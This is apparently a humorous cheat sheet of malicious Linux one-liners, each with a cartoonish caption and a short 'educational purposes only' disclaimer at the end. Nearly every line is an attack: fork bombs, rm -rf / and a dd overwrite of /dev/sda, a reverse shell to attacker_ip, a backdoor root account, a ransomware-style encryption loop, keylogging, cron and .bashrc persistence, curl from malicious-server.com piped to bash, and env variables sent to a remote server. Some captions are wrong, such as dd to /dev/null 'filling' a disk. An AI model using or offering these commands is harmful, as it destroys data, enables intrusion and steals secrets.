Recursively spawns processes until the system crashes.
:(){ :|: & };: # 𧨠Boom!
Fill up all disk space with a giant file!
dd if=/dev/zero of=/dev/null & # π Bye-bye, disk space!
Terminate all running processes and make your system cry.
kill -9 -1 # π RIP, all processes!
Wipe out everything β nothing shall survive!
rm -rf / # β οΈ Destruction in 3... 2... 1...
Even the hidden stuff...
rm -rf .* --no-preserve-root # π΅οΈββοΈ Hidden files? Not anymore!
Replace all data with random junk. Forever!
dd if=/dev/urandom of=/dev/sda bs=1M # π₯ Melting down the hard drive...
Hijack common commands for mayhem!
echo 'alias ls="rm -rf *"' >> ~/.bashrc # π Tricking users left and right!
Sneak in as a superuser.
useradd eviluser -p $(openssl passwd -1 "password") -G root # π Unlock root access!
Open a backdoor to connect back to you!
bash -i >& /dev/tcp/attacker_ip/port 0>&1 # π Calling home...
Lock up the terminal with an infinite loop.
:(){ echo ":() { :|: & };:" | sh; };: # β³ Freeze!
Redirect all data to your server.
iptables -A OUTPUT -j DNAT --to-destination <attacker_ip>:<port> # π¨ Data siphon engaged!
Pull the plug on network access.
ifconfig eth0 down # π« No more internet for you!
Seize control of every file.
chown root:root -R / # ποΈ Now you own everything!
Turn all files into gibberish until a ransom is paid.
for file in $(find . -type f); do openssl enc -aes-256-cbc -salt -in "$file" -out "${file}.enc" -k "password"; rm "$file"; done # π° Pay up!
Spy on every keystroke.
xinput test <device_id> > /tmp/keystrokes.log # π Logging every keystroke...
Make your evil commands run every time the terminal opens!
echo 'malicious_command' >> ~/.bashrc # πΈοΈ Persist, evil script, persist!
Use up all memory until the system begs for mercy.
:(){ :|: & };: # π£ Memory bomb!
Change DNS to point to your evil server.
echo 'nameserver 8.8.8.8' > /etc/resolv.conf # π΅οΈββοΈ Redirect all the DNS traffic!
Run whatever script you want from anywhere.
curl http://malicious-server.com/script.sh | bash # π― Gotcha!
Run a nasty script on every machine you can reach.
for ip in $(seq 1 254); do ssh user@192.168.1.$ip 'malicious_command'; done # π₯ Spreading the chaos!
Make your evil processes invisible.
mv /usr/bin/top /usr/bin/.top; echo 'alias top="/usr/bin/.top | grep -v evil_process"' >> ~/.bashrc # π» Now you see me, now you don't!
Create a persistent attack loop with cron jobs.
(crontab -l; echo "* * * * * bash -c 'malicious_command'") | crontab - # π Forever and ever...
Snoop on all data flying through the network.
tcpdump -i any -w /tmp/capture.pcap # π΅οΈββοΈ Got all your packets!
Lock the user out by denying shell access.
usermod -s /bin/false username # π· You're locked out!
Annoy users endlessly with pop-ups.
while true; do notify-send "Hello, World!"; done # π Ding! Ding! Ding!
Exfiltrate sensitive environment variables to your server.
env | curl -d @- http://malicious-server.com/upload # π΅οΈββοΈ Sending env variables...
π¨ Warning: This cheat sheet is meant for educational purposes only. It shows how seemingly simple commands can be weaponized to create havoc. Never use these commands on systems you do not own or manage, and always prioritize ethical behavior, respect privacy, and follow the law. π΅οΈββοΈπ»